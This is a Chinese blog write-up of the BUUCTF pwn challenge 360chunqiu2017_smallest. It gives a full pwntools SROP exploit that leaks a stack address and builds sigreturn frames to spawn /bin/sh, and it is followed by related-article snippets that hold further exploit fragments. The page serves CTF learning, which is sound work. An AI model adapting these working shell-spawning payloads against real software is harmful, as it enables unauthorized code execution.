BUUCTF Pwn 360chunqiu2017_smallest 题解

最新推荐文章于 2025-05-16 11:14:39 发布
最新推荐文章于 2025-05-16 11:14:39 发布
阅读量200 收藏
点赞数 1
分类专栏: BUUCTF Pwn 文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_33348179/article/details/145047434
版权

1.下载 得到文件 checksec exeinfo:

64位 拖入IDA64 

只有一个函数 看汇编:

进行了read操作 read的返回值是读取字符数 可以利用这一点进行SROP

要进行SROP 要有binsh地址 所以首先需要泄露栈地址:

start_addr = 0x4000B0
sysret_addr = 0x4000BE
payload = p64(start_addr) * 3

p.send(payload)
p.send(b'\xB3')
#第一个start_addr读取到0xB3 会将第二个start_addr跳过rax清零的步骤
#从而让rax变成1执行write泄露栈地址
#这时传入第三个start_addr填充,然后会泄露栈地址

stack = u64(p.recv()[0x8:0x10])
print(hex(stack))

接着就是要构造sigreturen 将SP移动到泄露地址上 方便得到binsh地址偏移

需要构造两段frame 第一段用于将返回地址跳到stack 第二段用于执行execve

exp:

from pwn import *

p = process('./small')
context.arch = 'amd64'
start_addr = 0x4000B0
sysret_addr = 0x4000BE
payload = p64(start_addr) * 3

p.send(payload)
p.send(b'\xB3')
#第一个start_addr读取到0xB3 会将第二个start_addr跳过rax清零的步骤
#从而让rax变成1执行write泄露栈地址
#这时传入第三个start_addr填充,然后会泄露栈地址

stack = u64(p.recv()[0x8:0x10])
print(hex(stack))

frame = SigreturnFrame()
frame.rax = constants.SYS_read
frame.rdi = 0
frame.rsi = stack
frame.rdx = 0x400
frame.rsp = stack
frame.rip = sysret_addr


payload = p64(start_addr) + b'a' * 8 + bytes(frame)
p.send(payload)
#这里是将8个a及frame压入栈中 方便等会syscall
#8个a的作用:在执行这段的start_addr时 SP正指向这8个a
#这时候再read syscall就会覆盖8个a

sig_payload = p64(sysret_addr) + b'b' * 7
p.send(sig_payload)
#这段payload用于将8个a覆盖为syscall
#并且让read读取15个字节 rax=15 方便sigreturn

frame.rax = constants.SYS_execve
frame.rdi = stack + 0x200
#这里的 0x200 可以写成任意小于read最大读取量且大于payload在frame前长度的值
#偏移自己定
frame.rsi = 0
frame.rdx = 0
frame.rip = sysret_addr

frame_payload = p64(start_addr) + b'b' * 8 + bytes(frame)
frame_payload = frame_payload.ljust(0x200, b'a') + b'/bin/sh\x00'
p.send(frame_payload)
p.send(sig_payload)
#这里send这个的意思是用syscall覆盖8个b 并且将rax设置为15
p.interactive()

本地能打通 线上找好久都没找到打通的方法

SROP 64位-smallest(2017429ctf.ichunqiu)
MillionSky的专栏
03-19 1320
1 概述360春秋杯”国际网络安全挑战赛Challenge - smallest (pwn 300) - 429 ichunqiu ctf 2017http://2017429ctf.ichunqiu.com/competition/index 64位SROP很好的练习题。2 程序分析millionsky@ubuntu-16:~/tmp/smallest$ objdump -d smallest ...
2017 429 ichunqiu ctf smallest(pwn300) writeup
jmp esp
05-22 2435
Challenge - smallest (pwn 300) - 429 ichunqiu ctf 2017吐槽这次这道smallest确实很有创造力,算是这次比赛我感觉比较好的地方了。这次比赛本身槽点是无数的,10点开始的比赛,11点都进不去平台,紧急修复到12点,然后12点半在网站通知比赛时间到1点,中途一直不肯决定 比赛到底推迟到几点进行,一早上的课都不敢好好上,确实是非常的坑。然后在做这道
SROP三连击(ciscn_2019_es_7、rootersctf_2019_srop、360chunqiu2017_smallest
huzai9527的博客
03-25 497
【SROP】ciscn_2019_es_7 1. ida 分析 vuln有两个函数,read、write;read函数存在栈溢出,write能够泄露栈上的地址 存在sigreturn的调用 2. 思路 首先泄露栈上的返回地址,然后通过gdb调试,输入的参数与返回地址的偏移 有了参数地址,站地址-偏移,就可以输入/bin/sh且得到它的地址 有了/bin/sh、栈地址、sigreturn、syscall就可以使用SROP 3. exp from pwn import * #p = proces
360chunqiu2017_smallest
qq_34010404的博客
05-26 190
stack地址不好泄露,但是发现elf的入口处刚好保存了start地址,只要把rsp设置为这个位置就能再次利用溢出 exp: from pwn import* #sh = process('./pwn') sh = remote('node4.buuoj.cn',29216) context.arch = 'amd64' syscall = 0x4000BE start = 0x4000B0 _context = SigreturnFrame() _context.rip = syscall _conte
360chunqiu2017_smallest —— 从例题理解SROP
Tokameine的博客
08-29 1481
前言: 本篇博客为个人学习过程中的理解,仅记录个人理解,WIKI写的要比本篇详细得多。若与其存在矛盾,请以WIKI为准,也感谢读者指出问题。 正文: SROP(Sigreturn Oriented Programming),与常规ROP的区别在于通过sigreturn函数来进行返回而不是retn指令 这里引用WIKI中对Signal机制的介绍: Signal 机制¶ Signal 机制是类 unix 系统中进程之间相互传递信息的一...
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 411
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
BUUCTF_PWN_test_your_nc详细题解
qq_46238551的博客
10-20 3318
test_your_nc_1 IDA PRO查看主函数 发现system("/bin/sh"),从主函数进入则执行getshell,所以直接nc或者写一个交互程序都可以getshell。 gdb动态分析,b main下主函数断点,r运行,看一下跳转到system函数后具体的执行过程 n单步执行,将程序调整到运行system函数之前 n单步执行,运行system(“/bin/sh”),观察getshell 本地gdb调试成功后,运行exp拿到flag exp.py ``..
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4223
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1106
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF pwn pwn2_sctf_2016
菜的只能随便写写博客
02-18 2624
0x01 分析   0x02 运行  程序读入一个长度,然后按照长度读入后面输入的data并回显。   0x03 IDA  数据长度被限制为32,无法溢出,接着查看get_n函数。  接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。   0x04 思路  输入负数长度,绕过长度检查,执行r...
ctf pwn 个人经验记录
jmp esp
05-22 8979
前言记录一下自己在做pwn的过程当中学到的一些东西,以前不知道的东西等等,碰到的坑也会记录在 这里,主要目的是帮助自己记录一下经验。其实每一道题基本上能学到的新东西是有限的,记录下来避免什么时候想不起来。顺序比较乱,基本上根据我做题的顺序定的,比较随意。pwnother place(not from ctf) 多用gdb调试,有思路可以先写出来调试一下看看效果再说 遇见pie考虑写malloc_h
buuoj Pwn writeup 191-195
yongbaoii的博客
06-12 629
191 huxiangbei_2019_hacknote 192 pwnable_simple_login 193 mrctf2020_spfa 194 360chunqiu2017_smallest 195 watevr_2019_voting_machine_1
360春秋杯CTF比赛WRIteUP
weixin_30414245的博客
05-24 389
题目:where is my cat? 地址:http://106.75.34.78 访问网页出现证书错误的问题,查看证书如下: 抓包发现: Accept-Encoding: gzip, deflate Cookie: PHPSESSID=ffdnl0nkcqoor5kei7ehmjal11; HOST=0 Connection: close HOST=0可能存在问题,可能是判断HO...
i春秋 429-线上赛题(一)Writeup
驻足
04-18 1827
360企业安全春秋杯”网络安全技术大赛—-线上赛题(一)Writeup 主体思路 利用joomla选择模板并且能自己编写网页文件的漏洞,将一句话木马写入网页中,之后菜刀连接拿到shell 具体实现 具体实现部分我已在我的博客中写明,还请移步 Marsguest’s Blog...
Linux pwn入门教程(8)——SROP
子曰小玖的博客
06-04 1721
https://bbs.ichunqiu.com/thread-44068-1-1.html 0x00 SROP应用场景与原理 SROP是一个于2014年被发表在信安顶会Okaland 2014上的文章提出的一种攻击方式,相信很多读者对这个方式的了解都源于freebuf上的这篇文章'http://www.freebuf.com/articles/network/87447.html'。 正如这...
WEB安全--Java安全--shiro550反序列化漏洞
最新发布
m0_74800552的博客
05-16 302
shiro550反序列化
安全巡检清单
yh
05-15 879
软件状态巡检应深入到系统内核层面。漏洞扫描是软件状态巡检的重要组成部分,需要定期对网络设备、主机、数据库、应用系统等进行全面的漏洞扫描,利用专业的扫描工具发现已知和未知的安全漏洞。通过严格执行本清单所列的各项检查内容,并结合企业自身的业务特点和安全需求进行适当调整和补充,可以有效地提升信息系统的整体安全水平,降低安全风险,为企业的稳健发展提供坚实保障。通过周期性的状态检查、安全扫描、日志分析和补丁管理,可以及时发现并修复潜在的安全隐患和漏洞,确保网络设备、服务器、操作系统及应用系统的高可用性和安全性。
安全版4.5.8开启审计后,hac+读写分离主备切换异常
HighGO
05-16 223
异常:hac集群一主两备环境,开启hgproxy和审计功能后,进行集群主备切换操作。切换过程持续近5分钟,主库方可切换到备节点上,其中未参与切换(原主与新主外的备节点)的备库无法拉起,持续restarting状态很长时间后start failed。解决此问题的安装包:hgdb-see-4.5.8-6954d9f.aarch64.rpm。BUG安装包: hgdb-see-4.5.8-db43858.aarch64.rpm。1、临时解决方案:关闭审计功能,修改审计参数后需要重启集群。系统平台:UOS (飞腾)
buuctf pwn others_shellcode
02-25
### BUUCTF Pwn Others_shellcode 解题思路 #### 题目概述 此题目属于PWN类别中的shellcode编写挑战。目标是在给定环境中执行任意代码,通常通过构造特定的机器码来实现这一目的[^1]。 #### 环境准备 为了成功完成该挑战,需了解所使用的`libc`版本特性以及其对应的函数偏移地址等信息。这有助于定位并利用可能存在的漏洞点。此外,还需掌握基本的反汇编技能以便理解二进制文件的工作原理。 #### 漏洞分析 通过对程序逻辑的研究发现存在一处可以被攻击者控制的数据输入路径。当用户提交恶意构造的数据时,能够覆盖返回地址从而改变正常流程指向自定义指令序列的位置。这种技术被称为“Return-Oriented Programming (ROP)” 或直接注入 shellcode 执行。 #### Shellcode 构建 考虑到现代操作系统防护机制如NX bit 和 ASLR 的存在,在构建有效载荷时需要特别注意避开非法字符以免破坏栈结构完整性。同时也要考虑如何绕过这些安全措施以确保 payload 成功运行。一种常见做法是从内存中寻找可写区域作为跳转目标,并在那里放置精心设计过的 machine code 来打开 shell 或连接远程服务器发送 flag。 ```python from pwn import * context.arch = 'amd64' context.os = 'linux' # 连接至服务端口 conn = remote('challenge_address', port_number) # 发送payload前先读取一些数据防止阻塞 conn.recvuntil(b'Input your choice:') ``` #### Exploit 实现 最终解决方案涉及多个部分协同工作:首先是找到合适的 gadget 组合用于泄露 libc 基址;其次是计算出 system() 函数的确切位置;最后则是巧妙安排参数传递方式使得 execve("/bin/sh", ...) 能够被执行。整个过程要求精确控制每一步操作以达到预期效果而不触发任何异常终止条件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值